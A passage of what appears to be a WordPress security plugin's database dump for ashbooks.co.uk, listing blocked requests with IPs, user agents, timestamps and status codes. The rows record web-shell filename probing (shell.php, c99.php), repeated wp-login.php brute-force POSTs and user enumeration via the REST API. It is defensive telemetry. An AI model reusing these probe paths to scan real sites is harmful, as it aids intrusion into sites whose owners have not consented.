Safari\\/537.36\"}','YvP3dog5LU4srGba6AJyNSmI',0,1637925620.1375,409,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/11index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BpEykhCQujoarscZ8GS9tv0m',0,1637925620.6875,118,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','WCmKnt07kNFbsrujcaOh4dTf',0,1637925620.9469,415,'','GET',404,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/nee.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','KTApbVsltjIGFZu8qc0n6ze5',0,1637925621.4942,121,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/v.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','xnR7ovTtfVHOFNsPbyELMeBX',0,1637925621.7490,155,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','9oRUqiVatPpzDvnjuNW3MOCF',0,1637925622.0449,414,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','iRvHz3wUEe8dTaQ0DbKuLNgj',0,1637925622.6080,121,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','AhlF4tdDSvYu3j1w7VLEM280',0,1637925622.8645,164,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VsOHIcdTCkRM7hDUjJi3e5En',0,1637925623.1654,411,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','XJzmq75YGHt1IQN6yiVP0hr9',0,1637925623.7140,125,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/sh3ll.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8nbpOdGcwWeS9BkotiNXgsvm',0,1637925623.9748,460,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','flE0Cc3ynMrbVF1dYiWALXg7',0,1637925624.5704,131,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/alexuse.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Spy5BdKOlNuVn9LUPCcoIvWX',0,1637925624.8353,159,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','XizCpxhcoD9V4aSNMKF6fE5l',0,1637925625.1318,413,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','U4z9BlWh6qjydGxcupeQw7C0',0,1637925625.6703,157,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0pxHUWFLSac1CeI3VfOKqPnr',0,1637925625.9619,404,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/lol.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','K7bhQs6evlzj81fuoStryGXx',0,1637925626.4943,118,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/87.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','G0v9eqi4ow2XKsbOHrYFZUJN',0,1637925626.7471,171,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/7yn.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','xWerV7F18AdQ5NIwMvBXUzb6',0,1637925627.0630,405,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','LkE78vJBiZyMUe9dgajq0VTQ',0,1637925627.7540,174,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','OsA3rnZw4PN28uLeqHmIxFSJ',0,1637925628.6781,687,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/13.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','D8lEkraJIMS6FUmyWsXiNYvG',0,1637925629.4921,134,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/cpanel.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','OpgKcENPd0ytCf2Q59X8z6nZ',0,1637925629.7662,128,'','GET',403,0,700,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','lYU1PrwaEqIhHoAZsQpzcu78',0,1637926526.1632,618,'','POST',403,0,600,0,1,'',0),('47.241.15.39',804327207,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','ncWbYhqTl364uNtPVkIiLOwf',0,1637930504.7518,519,'','POST',403,0,600,0,1,'',0),('91.176.123.228',1538292708,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','5XKN1jd7xkZ6JBsMSvCfDmWQ',0,1637930755.0712,451,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','ALP5NyWKMErq4ubUZJwgVpeB',0,1637930891.4041,710,'','POST',403,0,600,0,1,'',0),('124.122.186.225',2088418017,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','uVDaK1wbc0QMmEzrBisL7JTY',0,1637930934.6740,479,'','POST',403,0,600,0,1,'',0),('27.116.16.118',460591222,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','5bEiFCUzcBlvhGW1Nrk7soJS',0,1637930938.1717,373,'','POST',403,0,600,0,1,'',0),('189.56.190.63',3174612543,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','8ahxtd07RZVUnryKJYSEm5gC',0,1637931099.1573,512,'','POST',403,0,600,0,1,'',0),('103.194.243.190',1740829630,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','M2arqFO6ZSwuDWYjvJB5RkHC',0,1637931118.2916,900,'','POST',403,0,600,0,1,'',0),('76.22.195.157',1276560285,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','9DKUIFGZpizqvwBTAan2YN6r',0,1637931136.7289,184,'','POST',403,0,600,0,1,'',0),('107.150.57.35',1805007139,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','vxLTuEX0Z8bpGKawBigPzIRY',0,1637932552.3940,195,'','POST',403,0,600,0,1,'',0),('134.209.231.225',2261903329,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','YgfNQhvbJxLXDMlWREcCBZj8',0,1637933250.1001,517,'','POST',403,0,600,0,1,'',0),('47.241.15.39',804327207,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','Y4cUozhVQx5SXv1GnguCya26',0,1637934428.2536,476,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','WtaL1xvbp7KNjqM5Drn8hoTl',0,1637935244.4114,507,'','POST',403,0,600,0,1,'',0),('116.255.160.108',1962909804,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','Zxhy43amF1Ck2reDvic5W0zN',0,1637935718.7602,671,'','POST',403,0,600,0,1,'',0),('128.199.14.4',2160528900,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','LwfHSKWr8nRUjsXBicIh4D3F',0,1637936880.6748,861,'','POST',403,0,600,0,1,'',0),('163.178.170.141',2746395277,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','FS3WdhQmTGzqJnXLE5fisoM0',0,1637938948.9993,1390,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','9Bl4t2afnOLusMzA3Fm7PDgj',0,1637939586.5349,803,'','POST',403,0,600,0,1,'',0),('185.103.199.115',3110586227,'','https://ashbooks.co.uk/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','l10aNwrjiDveyBbL4tUGoupV',0,1637939693.6721,776,'','GET',403,0,700,0,1,'',0),('185.103.199.252',3110586364,'','https://ashbooks.co.uk/wp-includes/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','WulqNYjz0QXBnky81T9oE4tZ',0,1637939694.8054,169,'','GET',403,0,700,0,1,'',0),('185.103.199.119',3110586231,'','https://ashbooks.co.uk/wp-content/themes/sketch/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','JCydIZVLRicetYxsUvqHb27W',0,1637939695.5931,383,'','GET',403,0,700,0,1,'',0),('185.103.199.196',3110586308,'','https://ashbooks.co.uk/css/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','JDcwBdTmUe7kqvW9ZlN2Sftr',0,1637939696.6065,449,'','GET',403,0,700,0,1,'',0),('185.103.199.253',3110586365,'','https://ashbooks.co.uk/wp-content/themes/sketch/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','KvO0lyPDaNCef9XFWYbmrGi3',0,1637939697.7145,381,'','GET',403,0,700,0,1,'',0),('198.52.97.144',3325321616,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','IajpXgxFizrK9dqnQNAG8oRl',0,1637941161.7280,510,'','POST',403,0,600,0,1,'',0),('157.90.80.180',2639941812,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1700.107 Safari\\/537.36\"}','QPd6wJRTnDokZuqXzjV2iGfp',0,1637943469.8709,1258,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\"}','6w09LCbrXY3UeulFMRvgZkDt',0,1637943926.4336,659,'','POST',403,0,600,0,1,'',0),('181.174.125.214',3048111574,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','F86aTjM5xOISVlsh14AnDPKY',0,1637944583.8719,505,'','POST',403,0,600,0,1,'',0),('69.163.224.119',1168367735,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','t3BJjNX4Y59GQElZPupw1dMf',0,1637945652.5466,569,'','POST',403,0,600,0,1,'',0),('167.86.118.101',2807461477,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','2mZWAwvPySKtEsdcp1gRu0L6',0,1637946946.6269,437,'','POST',403,0,600,0,1,'',0),('185.31.175.188',3105861564,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','XuGkjc8V29JfnRzSyr7KTYFC',0,1637947319.3679,474,'','POST',403,0,600,0,1,'',0),('167.172.151.91',2813106011,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','Ol3I4uhaDJwqvsQTpXUKjt7e',0,1637948022.8244,521,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.1 Safari\\/537.36\"}','YGgyr6ATax2314NHtzieu7KJ',0,1637948270.1115,456,'','POST',403,0,600,0,1,'',0),('69.30.240.26',1159655450,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','tK40kVBRY7QZvxszWD1OnS5T',0,1637948597.6894,166,'','POST',403,0,600,0,1,'',0),('52.183.137.156',884443548,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','796rGUheExTLDwP01va4nqO3',0,1637949094.6562,515,'','POST',403,0,600,0,1,'',0),('23.228.109.147',400846227,'','https://ashbooks.co.uk/ofc/php-ofc-library/ofc_upload_image.php','','{\"1\":\"ALittle Client\"}','sVPcQeX5qv8Bo9x2lI63G0tT',0,1637950782.7637,385,'','GET',403,0,700,0,1,'',0),('196.244.192.38',3304374310,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/95.0.4638.69 Safari\\/537.36\"}','NZbJBisROelK4WuS0Mv6oc72',0,1637952351.7833,156,'','GET',403,0,520,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','7EskIYqtF2PCh0My4ZAxg9Bl',0,1637952608.8791,478,'','POST',403,0,600,0,1,'',0),('148.66.129.233',2487386601,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','DpMwCkuySJ9YFv32ArZ4Oc7z',0,1637952980.1363,578,'','POST',403,0,600,0,1,'',0),('45.158.15.146',765333394,'','https://ashbooks.co.uk/wp-content/hbhbrdryld.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','VGoDwfsp94FtnbLxWgYRduH3',0,1637954768.6901,334,'','GET',403,0,700,0,1,'',0),('62.178.170.93',1051896413,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','hxmIuF7dRZp6Yn5SKjwi38Ca',0,1637955473.6644,477,'','POST',403,0,600,0,1,'',0),('78.141.204.157',1317915805,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','L6SqAb29U84f5NrVDjyonI30',0,1637956636.2366,572,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.1 Safari\\/537.36\"}','GTY3ExNS72hjLRosu0VWB4X8',0,1637956948.6891,930,'','POST',403,0,600,0,1,'',0),('176.9.91.103',2953403239,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1700.107 Safari\\/537.36\"}','ebXZq5wDfxzL1aoUcHuFlvmy',0,1637957950.3987,575,'','POST',403,0,600,0,1,'',0),('187.51.127.28',3140714268,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','M2poAjwqv67dnGimf1CSRsQT',0,1637959049.5756,437,'','POST',403,0,600,0,1,'',0),('45.40.166.141',757638797,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','O7GmZ2A5dyf1UYvoPpM8rJNt',0,1637960113.0885,488,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','eNXdf6kbn3YajmMVT2g5WJvI',0,1637961287.4160,440,'','POST',403,0,600,0,1,'',0),('45.40.166.141',757638797,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','GkLu9Q3c70EVD5P2BUW6ObYn',0,1637961382.9265,427,'','POST',403,0,600,0,1,'',0),('34.71.143.226',575115234,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4240.193 Safari\\/537.36\"}','mlr1LtxNMGWVQaDH5ESb82z9',0,1637961713.4647,1099,'','GET',403,0,520,0,1,'',0),('34.71.143.226',575115234,'','https://ashbooks.co.uk//wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4240.193 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/\\/wp-login.php\"}','2rtUS9ad0ZnO8GeCfclLsKk6',0,1637961715.9704,1237,'','POST',403,0,600,0,1,'',0),('148.72.214.245',2487801589,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','qeVCnFNwUH0AEjKzsvrTMI6G',0,1637963427.1978,728,'','POST',403,0,600,0,1,'',0),('63.141.252.69',1066269765,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','iwgoUyDMKtc26h9VPOeFuZW8',0,1637963812.0835,422,'','POST',403,0,600,0,1,'',0),('197.5.152.234',3305478378,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','d8pMf0owFGKtkONIQArxln97',0,1637964072.9035,172,'','GET',403,0,520,0,1,'',0),('167.172.190.95',2813115999,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','kuCAyHOZQXmpVzfrWUFclaET',0,1637964659.0151,449,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','mReqwh2O8Z4f5ruAdYt7LIlc',0,1637965633.5606,416,'','POST',403,0,600,0,1,'',0),('159.65.238.248',2671898360,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','Sxn6KVQbBJu4srkYU78TROeo',0,1637965880.7195,232,'','POST',403,0,600,0,1,'',0),('157.245.217.209',2650134993,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','7YZSKikOFmHA9EpvhsLRXP4U',0,1637968232.9694,456,'','POST',403,0,600,0,1,'',0),('45.64.54.158',759183006,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','y32VNngfYrOcBhvFeRKWH6Gs',0,1637969312.9439,517,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','5H0bharqIRgC2OTKSQ6BVGMw',0,1637970000.8804,430,'','POST',403,0,600,0,1,'',0),('164.68.99.94',2755945310,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','Jx42XYSpCZBt5mEdq3DGbuUP',0,1637970391.7676,447,'','POST',403,0,600,0,1,'',0),('138.68.248.47',2319775791,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','fMWisruE1welONqx9Q4DyRYm',0,1637971437.5424,608,'','POST',403,0,600,0,1,'',0),('185.220.101.32',3118228768,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 